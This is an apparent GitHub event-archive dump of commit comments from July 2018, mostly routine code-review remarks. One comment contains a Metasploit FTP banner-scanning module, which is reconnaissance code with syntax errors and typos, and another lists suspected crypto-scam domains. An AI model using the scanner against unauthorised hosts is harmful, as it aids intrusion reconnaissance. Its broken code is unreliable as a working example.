{"id":"7999479560","type":"CommitCommentEvent","actor":{"login":"onmicr"},"repo":{"name":"onmicr/github-pages-with-jekyll"},"payload":{"comment":{"id":29790738,"position":7,"line":6,"path":"README.md","commit_id":"6e794a7268d9a9a4ef31d7e7e229053289f53090","created_at":"2018-07-22T02:02:58Z","updated_at":"2018-07-22T02:02:58Z","author_association":"OWNER","body":"起步¤更为了解,关爱只争朝夕"}},"created_at":"2018-07-22T02:02:58Z"}
{"id":"7999481029","type":"CommitCommentEvent","actor":{"login":"zachdyer"},"repo":{"name":"zachdyer/python"},"payload":{"comment":{"id":29790740,"position":null,"line":null,"path":null,"commit_id":"d9292ee706721620e132884c03d0b6bb941690d5","created_at":"2018-07-22T02:04:16Z","updated_at":"2018-07-22T02:04:16Z","author_association":"OWNER","body":"Python cleans up the screen now."}},"created_at":"2018-07-22T02:04:16Z"}
{"id":"7999481775","type":"CommitCommentEvent","actor":{"login":"cryptoB0T"},"repo":{"name":"coinfi/coinfi"},"payload":{"comment":{"id":29790742,"position":8,"line":78,"path":"app/javascript/App/components/NewsfeedPage/NewsList.js","commit_id":"c9f9f9179af257ad6b2270a9b3911fc03eabfd8b","created_at":"2018-07-22T02:05:07Z","updated_at":"2018-07-22T02:05:07Z","author_association":"CONTRIBUTOR","body":"nice one, definitely more readable!"}},"created_at":"2018-07-22T02:05:07Z"}
{"id":"7999486839","type":"CommitCommentEvent","actor":{"login":"MachineGao"},"repo":{"name":"cmansley/pomdp-python"},"payload":{"comment":{"id":29790747,"position":1,"line":73,"path":"pomdp.py","commit_id":"a0bc6dc94b027fb9406926b8aeff1cc4fbb03276","created_at":"2018-07-22T02:10:36Z","updated_at":"2018-07-22T02:10:36Z","author_association":"NONE","body":"1"}},"created_at":"2018-07-22T02:10:36Z"}
{"id":"7999490128","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29790750,"position":null,"line":null,"path":null,"commit_id":"dd91eca915520ec7aaa85ebcfbda0417db64b349","created_at":"2018-07-22T02:14:09Z","updated_at":"2018-07-22T02:14:09Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3152 "}},"created_at":"2018-07-22T02:14:09Z"}
{"id":"7999490249","type":"CommitCommentEvent","actor":{"login":"ernestod113"},"repo":{"name":"ernestod113/Script-Bucket"},"payload":{"comment":{"id":29790751,"position":null,"line":null,"path":null,"commit_id":"8f275c287028afbf38076b52d0a23d394ab9aa07","created_at":"2018-07-22T02:14:15Z","updated_at":"2018-07-22T02:14:15Z","author_association":"OWNER","body":"require 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Exploit::Remote::Ftp\r\ninclude Msf::Auxiliary::Scanner\r\ndef initialize\r\n super(\r\n    'Name'        => 'Detector ernestolopez de ftp ',\r\n    'Description' => 'Detectar el sevicio ftp'\r\n    'Authot'      => 'ernestolopez'\r\n    'License'     => MSF_LICENSE\r\n)\r\nregister_options(\r\n      [\r\n        Opt::RPORT(21),\r\n      ], self.class)\r\nend\r\n\r\ndef run_host(target_host)\r\n connect(true, false)\r\n if(banner)\r\n print_status(\"#{rhost} esta ajecutando #{banner}\")\r\n  end\r\n  disconnet\r\n end\r\nend\r\n"}},"created_at":"2018-07-22T02:14:15Z"}
{"id":"7999492017","type":"CommitCommentEvent","actor":{"login":"Eclipse972"},"repo":{"name":"Eclipse972/Dossiers_Techniques"},"payload":{"comment":{"id":29790756,"position":null,"line":null,"path":null,"commit_id":"d8ebde0490410e149e303e5fd5572aabcd11b4fc","created_at":"2018-07-22T02:16:16Z","updated_at":"2018-07-22T02:16:16Z","author_association":"OWNER","body":"le pti_nom pour pince de marquage et pince de robot est le même: \"pince\". Cette ajout permet de les classer correctement."}},"created_at":"2018-07-22T02:16:16Z"}
{"id":"7999492025","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29790757,"position":null,"line":null,"path":null,"commit_id":"3131d5ebdb8bfbbda38af75873c780b463f9fa68","created_at":"2018-07-22T02:16:17Z","updated_at":"2018-07-22T02:16:17Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3152 "}},"created_at":"2018-07-22T02:16:17Z"}
{"id":"7999494063","type":"CommitCommentEvent","actor":{"login":"enzobrunii"},"repo":{"name":"Estebank94/Provi"},"payload":{"comment":{"id":29790758,"position":4,"line":4,"path":"src/store/api.js","commit_id":"59f54f2563aac80f170637d21bc448e71267ac2c","created_at":"2018-07-22T02:18:32Z","updated_at":"2018-07-22T02:18:32Z","author_association":"COLLABORATOR","body":"Acá debería ir la URL del backend node."}},"created_at":"2018-07-22T02:18:32Z"}
{"id":"7999508730","type":"CommitCommentEvent","actor":{"login":"brammool"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29790785,"position":10,"line":64,"path":"runtime/mswin.vim","commit_id":"a9604e61451707b38fdcb088fbfaeea2b922fef6","created_at":"2018-07-22T02:34:13Z","updated_at":"2018-07-22T02:34:13Z","author_association":"CONTRIBUTOR","body":"\n> > +inoremap <C-S>\t\t<Esc>:update<CR>gi\n> \n> Doesn't that break in easy Vim?\n\nI don't think so, because the Esc isn't typed.  Have you tried it?\n\n-- \nIf I tell you \"you have a beautiful body\", would you hold it against me?\n\n /// Bram Moolenaar -- Bram@Moolenaar.net -- http://www.Moolenaar.net   \\\\\\\n///        sponsor Vim, vote for features -- http://www.Vim.org/sponsor/ \\\\\\\n\\\\\\  an exciting new programming language -- http://www.Zimbu.org        ///\n \\\\\\            help me help AIDS victims -- http://ICCF-Holland.org    ///\n"}},"created_at":"2018-07-22T02:34:13Z"}
{"id":"7999508876","type":"CommitCommentEvent","actor":{"login":"mageshmcc"},"repo":{"name":"JamaSoftware/UploadAttachments"},"payload":{"comment":{"id":29790786,"position":58,"line":58,"path":"Python/Main.py","commit_id":"3cda6611483c20fe6c804b89cc3c3efeecf695ea","created_at":"2018-07-22T02:34:22Z","updated_at":"2018-07-22T02:34:22Z","author_association":"NONE","body":"print(\"done\") considering you are you are using python3"}},"created_at":"2018-07-22T02:34:22Z"}
{"id":"7999510348","type":"CommitCommentEvent","actor":{"login":"ohld"},"repo":{"name":"expload/pravda"},"payload":{"comment":{"id":29790790,"position":null,"line":null,"path":null,"commit_id":"aac7d563a479c349d5b5c8b13d7cea5b757564f8","created_at":"2018-07-22T02:36:04Z","updated_at":"2018-07-22T02:36:04Z","author_association":"NONE","body":"Yeah!"}},"created_at":"2018-07-22T02:36:04Z"}
{"id":"7999511677","type":"CommitCommentEvent","actor":{"login":"DethRaid"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":29790792,"position":1,"line":65,"path":"mod/run/shaderpacks/DefaultShaderpack/shaders/panorama.vert","commit_id":"73e9047cb81cacf47915bd8c9cae30a7c76243cc","created_at":"2018-07-22T02:37:31Z","updated_at":"2018-07-22T02:37:31Z","author_association":"MEMBER","body":"If only there was a UBO that could hold the width and the height of the screen... "}},"created_at":"2018-07-22T02:37:31Z"}
{"id":"7999511957","type":"CommitCommentEvent","actor":{"login":"DethRaid"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":29790793,"position":10,"line":73,"path":"mod/run/shaderpacks/DefaultShaderpack/shaders/panorama.vert","commit_id":"73e9047cb81cacf47915bd8c9cae30a7c76243cc","created_at":"2018-07-22T02:37:49Z","updated_at":"2018-07-22T02:37:49Z","author_association":"MEMBER","body":"Why are you doing this in a vertex shader and not on the CPU?"}},"created_at":"2018-07-22T02:37:49Z"}
{"id":"7999512810","type":"CommitCommentEvent","actor":{"login":"DethRaid"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":29790795,"position":92,"line":155,"path":"mod/src/main/java/com/continuum/nova/mixin/gui/MixinGuiMainMenu.java","commit_id":"a9d278240e4f6c74dc7e363f2cc5ee1bada4a0dd","created_at":"2018-07-22T02:38:46Z","updated_at":"2018-07-22T02:38:46Z","author_association":"MEMBER","body":"Could you spell out your variable names?"}},"created_at":"2018-07-22T02:38:46Z"}
{"id":"7999514006","type":"CommitCommentEvent","actor":{"login":"xunjiangxinyichuxin"},"repo":{"name":"xunjiangxinyichuxin/xunjiangxinyichuxin.github.io"},"payload":{"comment":{"id":29790798,"position":null,"line":null,"path":null,"commit_id":"41bcaf9c34c85d74abc7f8d6a87578a91d0bf2ff","created_at":"2018-07-22T02:40:13Z","updated_at":"2018-07-22T02:40:13Z","author_association":"OWNER","body":"8"}},"created_at":"2018-07-22T02:40:13Z"}
{"id":"7999514599","type":"CommitCommentEvent","actor":{"login":"lmtierney"},"repo":{"name":"watir/nerodia"},"payload":{"comment":{"id":29790801,"position":null,"line":null,"path":null,"commit_id":"2a7614c39998be1824d32737406892276d8638f5","created_at":"2018-07-22T02:40:49Z","updated_at":"2018-07-22T02:40:49Z","author_association":"COLLABORATOR","body":"That's definitely something we can add. Since this is a port of WATIR, some things like this are overlooked because there's already a way to do this sort of thing outside of Watir. Please create a new issue for this feature request.\r\n\r\nAlso, in the future, please go through one of our support channels as shown in the [readme](https://github.com/watir/nerodia/blob/master/README.rst). Comments on commits are easily missed."}},"created_at":"2018-07-22T02:40:49Z"}
{"id":"7999515326","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29790803,"position":null,"line":null,"path":null,"commit_id":"abfbcda589f38c95fd63fde599d8f2e1627941ec","created_at":"2018-07-22T02:41:27Z","updated_at":"2018-07-22T02:41:27Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-909](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-909).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-909-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-22T02:41:27Z"}
{"id":"7999518147","type":"CommitCommentEvent","actor":{"login":"Gregory-Meyer"},"repo":{"name":"umigv/ranges"},"payload":{"comment":{"id":29790812,"position":null,"line":null,"path":null,"commit_id":"bed40967979dc5e293e0ac9480823c62da991ea4","created_at":"2018-07-22T02:44:31Z","updated_at":"2018-07-22T02:44:31Z","author_association":"CONTRIBUTOR","body":"Closes #9 "}},"created_at":"2018-07-22T02:44:31Z"}
{"id":"7999523014","type":"CommitCommentEvent","actor":{"login":"andylizi"},"repo":{"name":"BukkitAPI-Translation-Group/Chinese_BukkitAPI"},"payload":{"comment":{"id":29790820,"position":null,"line":null,"path":null,"commit_id":"b58d264e2f40887b207252d0afa13a3668fcb47d","created_at":"2018-07-22T02:49:53Z","updated_at":"2018-07-22T02:49:53Z","author_association":"CONTRIBUTOR","body":"话说为什么要加这个啊……？"}},"created_at":"2018-07-22T02:49:53Z"}
{"id":"7999529584","type":"CommitCommentEvent","actor":{"login":"wysixdog"},"repo":{"name":"wysixdog/cangku666"},"payload":{"comment":{"id":29790829,"position":null,"line":null,"path":null,"commit_id":"58ac8057591a9220cb6ad4f97df26ac746b3335b","created_at":"2018-07-22T02:57:23Z","updated_at":"2018-07-22T02:57:23Z","author_association":"OWNER","body":"用node 实现上传文件在本地接收。"}},"created_at":"2018-07-22T02:57:23Z"}
{"id":"7999529605","type":"CommitCommentEvent","actor":{"login":"pdanpdan"},"repo":{"name":"quasarframework/quasar-framework.org"},"payload":{"comment":{"id":29790830,"position":85,"line":85,"path":"source/guide/app-prefetch-feature.md","commit_id":"31f13df0f683a3a57bebf2f7ae204bba2d342a83","created_at":"2018-07-22T02:57:24Z","updated_at":"2018-07-22T02:57:24Z","author_association":"CONTRIBUTOR","body":"Route(false) or redirect(false)?"}},"created_at":"2018-07-22T02:57:24Z"}
{"id":"7999531640","type":"CommitCommentEvent","actor":{"login":"rstoenescu"},"repo":{"name":"quasarframework/quasar-framework.org"},"payload":{"comment":{"id":29790834,"position":85,"line":85,"path":"source/guide/app-prefetch-feature.md","commit_id":"31f13df0f683a3a57bebf2f7ae204bba2d342a83","created_at":"2018-07-22T02:59:19Z","updated_at":"2018-07-22T02:59:19Z","author_association":"MEMBER","body":"Mistake, yeah."}},"created_at":"2018-07-22T02:59:19Z"}
{"id":"8000777852","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29794113,"position":21,"line":36,"path":"src/hdskins/java/com/voxelmodpack/hdskins/upload/awt/FileDropper.java","commit_id":"c5fca4c9777bcf66743b028901c3bb092554f0dd","created_at":"2018-07-22T20:00:40Z","updated_at":"2018-07-22T20:00:40Z","author_association":"MEMBER","body":"The user is not supposed to be able to close the file dropper on its own. This was an explicit and intended behavioural change. If you do close it you have to close and re-open the skins gui to get it back."}},"created_at":"2018-07-22T20:00:40Z"}
{"id":"8000779892","type":"CommitCommentEvent","actor":{"login":"jesusp87"},"repo":{"name":"jesusp87/jp-random-tests"},"payload":{"comment":{"id":29794116,"position":18,"line":91,"path":"code-review/ProfileView.js","commit_id":"632c02caf4788f4620301e5dd55b32f9fb0ed33a","created_at":"2018-07-22T20:02:06Z","updated_at":"2018-07-22T20:02:06Z","author_association":"OWNER","body":"The two new methods in 'ItemDetailView' to perform 'goBack' action from both views."}},"created_at":"2018-07-22T20:02:06Z"}
{"id":"8000780919","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29794118,"position":21,"line":36,"path":"src/hdskins/java/com/voxelmodpack/hdskins/upload/awt/FileDropper.java","commit_id":"c5fca4c9777bcf66743b028901c3bb092554f0dd","created_at":"2018-07-22T20:02:49Z","updated_at":"2018-07-22T20:02:49Z","author_association":"MEMBER","body":"I got annoyed with it."}},"created_at":"2018-07-22T20:02:49Z"}
{"id":"8000782042","type":"CommitCommentEvent","actor":{"login":"ahadadi"},"repo":{"name":"outbrain/ob1k"},"payload":{"comment":{"id":29794119,"position":17,"line":127,"path":"ob1k-cache/src/test/java/com/outbrain/ob1k/cache/AbstractMemcachedClientTest.java","commit_id":"653d73947038f11cd193166e6a36c3adbac96db4","created_at":"2018-07-22T20:03:35Z","updated_at":"2018-07-22T20:03:35Z","author_association":"COLLABORATOR","body":"I now added tests to cover the 3 types of races."}},"created_at":"2018-07-22T20:03:35Z"}
{"id":"8000782986","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29794120,"position":null,"line":null,"path":null,"commit_id":"7756528e445411735c80f08a56dd94055d36cae6","created_at":"2018-07-22T20:04:13Z","updated_at":"2018-07-22T20:04:13Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-256](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-256).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-256-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-22T20:04:13Z"}
{"id":"8000784900","type":"CommitCommentEvent","actor":{"login":"igorzash"},"repo":{"name":"igorzash/chat"},"payload":{"comment":{"id":29794123,"position":null,"line":null,"path":null,"commit_id":"4f9eaa02aab9b1a96b192426a99db56d13fb4cce","created_at":"2018-07-22T20:05:32Z","updated_at":"2018-07-22T20:05:32Z","author_association":"OWNER","body":"Solve index.php echo devels"}},"created_at":"2018-07-22T20:05:32Z"}
{"id":"8000787443","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29794128,"position":21,"line":36,"path":"src/hdskins/java/com/voxelmodpack/hdskins/upload/awt/FileDropper.java","commit_id":"c5fca4c9777bcf66743b028901c3bb092554f0dd","created_at":"2018-07-22T20:07:22Z","updated_at":"2018-07-22T20:07:22Z","author_association":"MEMBER","body":"Alright. Then what about a button to toggle it from inside the game window?"}},"created_at":"2018-07-22T20:07:22Z"}
{"id":"8000787928","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29794130,"position":21,"line":36,"path":"src/hdskins/java/com/voxelmodpack/hdskins/upload/awt/FileDropper.java","commit_id":"c5fca4c9777bcf66743b028901c3bb092554f0dd","created_at":"2018-07-22T20:07:45Z","updated_at":"2018-07-22T20:07:45Z","author_association":"MEMBER","body":"If you want, sure. Put it next to browse or something."}},"created_at":"2018-07-22T20:07:45Z"}
{"id":"8000790863","type":"CommitCommentEvent","actor":{"login":"Siedlerchr"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":29794136,"position":34,"line":58,"path":"src/main/java/org/jabref/gui/importer/fetcher/WebSearchPaneViewModel.java","commit_id":"585dff62b9053f8510c0fa58ef4565b77876aa55","created_at":"2018-07-22T20:09:53Z","updated_at":"2018-07-22T20:09:53Z","author_association":"CONTRIBUTOR","body":"Why not store the concrete fetcher name/class instead the position? "}},"created_at":"2018-07-22T20:09:53Z"}
{"id":"8000791761","type":"CommitCommentEvent","actor":{"login":"npostavs"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":29794137,"position":null,"line":null,"path":null,"commit_id":"533223634f893bba838ada3f026d1f072339160e","created_at":"2018-07-22T20:10:28Z","updated_at":"2018-07-22T20:10:28Z","author_association":"MEMBER","body":"> However Emacs developers plan to deprecate it in favor of `when-let*` and that does not allow to do so.\r\n\r\nOh, as far as I know that deprecation was cancelled (somewhat last-minute), and there are no plans to redo it.\r\n\r\nRelated emacs-devel threads:\r\n[if-let/if-let*/and-let/..](https://lists.gnu.org/archive/html/emacs-devel/2018-02/msg00323.html)\r\n[Re: if-let/if-let*/and-let/..](https://lists.gnu.org/archive/html/emacs-devel/2018-03/msg00052.html)\r\n[Re: Heads-up: Emacs 26.1 RC1](https://lists.gnu.org/archive/html/emacs-devel/2018-03/msg00611.html)"}},"created_at":"2018-07-22T20:10:28Z"}
{"id":"8000795031","type":"CommitCommentEvent","actor":{"login":"Tomsyphers"},"repo":{"name":"CryptoFR/crypto-scams-fr"},"payload":{"comment":{"id":29794138,"position":null,"line":null,"path":null,"commit_id":"0b177b76fb0cf997fba1f63cb50bc8ee997d58f2","created_at":"2018-07-22T20:12:46Z","updated_at":"2018-07-22T20:12:46Z","author_association":"NONE","body":"btc-banque.com\r\ncryptos-invest.net\r\ncrypto-logic.com\r\ncrypto-platinium.com\r\ncryptosuissecapital.com\r\ngoodcoin.fr\r\niminage.com\r\nism-capital.com\r\nkryptowize.com\r\nlamaisondubtc.com\r\nlondon-equity.com\r\nmaisonducoins.net\r\nmc-crypto.com\r\nmoneo-invest.com\r\nrmcas-ltd.com\r\nsave-coins.com\r\ntradabank.com\r\nwallet-option.com\r\nworld-cryptos.com\r\n"}},"created_at":"2018-07-22T20:12:46Z"}
{"id":"8000795071","type":"CommitCommentEvent","actor":{"login":"Reevo55"},"repo":{"name":"Harp0n/Start"},"payload":{"comment":{"id":29794139,"position":1,"line":1,"path":"Test","commit_id":"2dfdb1aad5ef467c53377b79ae29559d735487e8","created_at":"2018-07-22T20:12:48Z","updated_at":"2018-07-22T20:12:48Z","author_association":"NONE","body":"siema siema"}},"created_at":"2018-07-22T20:12:48Z"}
{"id":"8000798476","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"openthos/oto_bootable_newinstaller"},"payload":{"comment":{"id":29794143,"position":null,"line":null,"path":null,"commit_id":"87a2e544b99d343538bd7d393d1bb186b5ce98af","created_at":"2018-07-22T20:15:13Z","updated_at":"2018-07-22T20:15:13Z","author_association":"NONE","body":"Btw why u use iso image for OTA intead of incremental zip? I saw that Phoenix used otapackage.zip. Tried implement their methods but faced with set_metada problems. (set_perms too)"}},"created_at":"2018-07-22T20:15:13Z"}
{"id":"8000799223","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29794147,"position":17,"line":27,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/Flights/FlightsFinder.java","commit_id":"f6601e4db1b499c0416c302ed56aef696fbc4544","created_at":"2018-07-22T20:15:43Z","updated_at":"2018-07-22T20:15:43Z","author_association":"NONE","body":"Do seta powinny być dodane loty - obiekty typu Flight. Dodatkowa klasa nie jest potrzebna"}},"created_at":"2018-07-22T20:15:43Z"}
{"id":"8000799888","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"alex707/L2"},"payload":{"comment":{"id":29794148,"position":14,"line":14,"path":"1.rb","commit_id":"8572c445c3e22da1489b6e7b47b955b8738030e2","created_at":"2018-07-22T20:16:10Z","updated_at":"2018-07-22T20:16:10Z","author_association":"NONE","body":"для hash лучше делать each do |month, days|\r\n\r\nобщий концепт: each do |key, value|\r\n"}},"created_at":"2018-07-22T20:16:10Z"}
{"id":"8000800348","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"alex707/L2"},"payload":{"comment":{"id":29794149,"position":2,"line":2,"path":"2.rb","commit_id":"8572c445c3e22da1489b6e7b47b955b8738030e2","created_at":"2018-07-22T20:16:31Z","updated_at":"2018-07-22T20:16:31Z","author_association":"NONE","body":"each { |i| arr << i }\r\nможно заменить на to_a"}},"created_at":"2018-07-22T20:16:31Z"}
{"id":"8000800773","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29794150,"position":null,"line":null,"path":null,"commit_id":"6739f69af00a6c3e8639589a10f67f1d5d3df742","created_at":"2018-07-22T20:16:51Z","updated_at":"2018-07-22T20:16:51Z","author_association":"MEMBER","body":"https://gist.github.com/GrahamcOfBorg/2cd5fec4d4b73db0e60dfa69a81c50e3"}},"created_at":"2018-07-22T20:16:51Z"}
{"id":"8000801837","type":"CommitCommentEvent","actor":{"login":"zturtleman"},"repo":{"name":"iortcw/iortcw"},"payload":{"comment":{"id":29794152,"position":null,"line":null,"path":null,"commit_id":"3795b5bf5595b30b462885a9c400b78ee14abaa9","created_at":"2018-07-22T20:17:41Z","updated_at":"2018-07-22T20:17:41Z","author_association":"CONTRIBUTOR","body":"(never mind, raspberry pi 3b runs 20-70fps after clean build.)"}},"created_at":"2018-07-22T20:17:41Z"}
{"id":"8000802939","type":"CommitCommentEvent","actor":{"login":"kalarlayhth"},"repo":{"name":"RedRibbon/redribbot"},"payload":{"comment":{"id":29794158,"position":null,"line":null,"path":null,"commit_id":"ccabf65373002ccd46f0fdee62eaadcb05c7c9bc","created_at":"2018-07-22T20:18:29Z","updated_at":"2018-07-22T20:18:29Z","author_association":"NONE","body":"ccabf65"}},"created_at":"2018-07-22T20:18:29Z"}
{"id":"8000803034","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29794159,"position":null,"line":null,"path":null,"commit_id":"6739f69af00a6c3e8639589a10f67f1d5d3df742","created_at":"2018-07-22T20:18:35Z","updated_at":"2018-07-22T20:18:35Z","author_association":"MEMBER","body":"This is the second time, please use PR next time."}},"created_at":"2018-07-22T20:18:35Z"}
{"id":"8000804889","type":"CommitCommentEvent","actor":{"login":"raa-eruanna"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29794161,"position":null,"line":null,"path":null,"commit_id":"fccb0b76c6a99954628b8c819fbddb018ee8a061","created_at":"2018-07-22T20:20:00Z","updated_at":"2018-07-22T20:20:00Z","author_association":"COLLABORATOR","body":"Ah... you're right...and I had it right to start with >_<\r\n\r\nI wasn't sure if it was worth throwing the entire header in for a single function, but since the file is small I guess it's not a big deal. I can push a fix later on today to use the templates.h file instead and fix the code to use the correct function."}},"created_at":"2018-07-22T20:20:00Z"}
{"id":"8000806717","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"alex707/L2"},"payload":{"comment":{"id":29794163,"position":36,"line":36,"path":"6.rb","commit_id":"8572c445c3e22da1489b6e7b47b955b8738030e2","created_at":"2018-07-22T20:21:17Z","updated_at":"2018-07-22T20:21:17Z","author_association":"NONE","body":"Не выведена корзина:\r\n\r\nЗаполнить и вывести на экран хеш, ключами которого являются названия товаров, а значением - вложенный хеш, содержащий цену за единицу товара и кол-во купленного товара. Также вывести итоговую сумму за каждый товар.\r\nВычислить и вывести на экран итоговую сумму всех покупок в \"корзине\"."}},"created_at":"2018-07-22T20:21:17Z"}
{"id":"8000808182","type":"CommitCommentEvent","actor":{"login":"kalarlayhth"},"repo":{"name":"nellessen/Tornado-Redis-Chat"},"payload":{"comment":{"id":29794164,"position":null,"line":null,"path":null,"commit_id":"339183ae9ddd4f507ea0408286759c50ddd6acb4","created_at":"2018-07-22T20:22:19Z","updated_at":"2018-07-22T20:22:19Z","author_association":"NONE","body":"339183a"}},"created_at":"2018-07-22T20:22:19Z"}
{"id":"8000809253","type":"CommitCommentEvent","actor":{"login":"Wasa101"},"repo":{"name":"Pixelatory/Obi-Wan"},"payload":{"comment":{"id":29794166,"position":null,"line":null,"path":null,"commit_id":"c7e5f64832e21f234589ffcd87342328f54a3adc","created_at":"2018-07-22T20:23:06Z","updated_at":"2018-07-22T20:23:06Z","author_association":"COLLABORATOR","body":"gay"}},"created_at":"2018-07-22T20:23:06Z"}
{"id":"8000809426","type":"CommitCommentEvent","actor":{"login":"darkza"},"repo":{"name":"raspberrypi/documentation"},"payload":{"comment":{"id":29794167,"position":15,"line":15,"path":"configuration/wireless/headless.md","commit_id":"8e5e7bdea0265d4e418fd508bd1db5a1f7c86873","created_at":"2018-07-22T20:23:13Z","updated_at":"2018-07-22T20:23:13Z","author_association":"NONE","body":"Please add that you mean The root partition and not the folder on root fs named boot"}},"created_at":"2018-07-22T20:23:13Z"}
{"id":"8000809578","type":"CommitCommentEvent","actor":{"login":"ahadadi"},"repo":{"name":"outbrain/ob1k"},"payload":{"comment":{"id":29794168,"position":17,"line":127,"path":"ob1k-cache/src/test/java/com/outbrain/ob1k/cache/AbstractMemcachedClientTest.java","commit_id":"653d73947038f11cd193166e6a36c3adbac96db4","created_at":"2018-07-22T20:23:19Z","updated_at":"2018-07-22T20:23:19Z","author_association":"COLLABORATOR","body":"Adding random keys to avoid the need to delete key that repeats between tests."}},"created_at":"2018-07-22T20:23:19Z"}
{"id":"8000818175","type":"CommitCommentEvent","actor":{"login":"chrisdukakis"},"repo":{"name":"iotaledger/mam.client.js"},"payload":{"comment":{"id":29794181,"position":null,"line":null,"path":null,"commit_id":"ea50c24a9b0290f0156d131256446639438eb478","created_at":"2018-07-22T20:29:24Z","updated_at":"2018-07-22T20:29:24Z","author_association":"MEMBER","body":"Hey @lutostag that's not a flaw; `const` was [block scoped](https://en.wikipedia.org/wiki/Scope_(computer_science)#Block_scope) to `while` and not to `keyGen` function. New bytes were generated per iteration. Also note that `const` fits better because we wouldn't need mutation, and it's standard industry practice to use constants over `let` declarations when possible.\r\n\r\nJust posting for clarification, and given it has been merged, please don't waste time to change it back to `const`, it's  still ok."}},"created_at":"2018-07-22T20:29:24Z"}
{"id":"8000818394","type":"CommitCommentEvent","actor":{"login":"tacotexmex"},"repo":{"name":"thomasrudin-mt/missions"},"payload":{"comment":{"id":29794182,"position":null,"line":null,"path":null,"commit_id":"35516a35b6b6b1f6cfe9a5fbd8e386d13562fe19","created_at":"2018-07-22T20:29:33Z","updated_at":"2018-07-22T20:29:33Z","author_association":"NONE","body":"Player-made missions, now we’re talking!"}},"created_at":"2018-07-22T20:29:33Z"}
{"id":"8000818411","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794183,"position":14,"line":34,"path":"vendor.prop","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:29:34Z","updated_at":"2018-07-22T20:29:34Z","author_association":"MEMBER","body":"this necessary @SagarMakhar ?"}},"created_at":"2018-07-22T20:29:34Z"}
{"id":"8000818576","type":"CommitCommentEvent","actor":{"login":"fbottarel"},"repo":{"name":"fbottarel/grasp-pose-gen"},"payload":{"comment":{"id":29794184,"position":null,"line":null,"path":null,"commit_id":"74ce150d663b21a20450439adbc42e4b11d83776","created_at":"2018-07-22T20:29:40Z","updated_at":"2018-07-22T20:29:40Z","author_association":"OWNER","body":"Roger that! :+1: "}},"created_at":"2018-07-22T20:29:40Z"}
{"id":"8000820090","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794189,"position":15,"line":2806,"path":"proprietary-files.txt","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:30:40Z","updated_at":"2018-07-22T20:30:40Z","author_association":"MEMBER","body":"this not right, -app/ims/ims.apk:vendor/app/ims/ims.apk"}},"created_at":"2018-07-22T20:30:40Z"}
{"id":"8000820359","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794190,"position":16,"line":2807,"path":"proprietary-files.txt","commit_id":"e0bce3bfa34fdd2e9a28575bad66945f8e2f37ca","created_at":"2018-07-22T20:30:53Z","updated_at":"2018-07-22T20:30:53Z","author_association":"MEMBER","body":"same as ^"}},"created_at":"2018-07-22T20:30:53Z"}
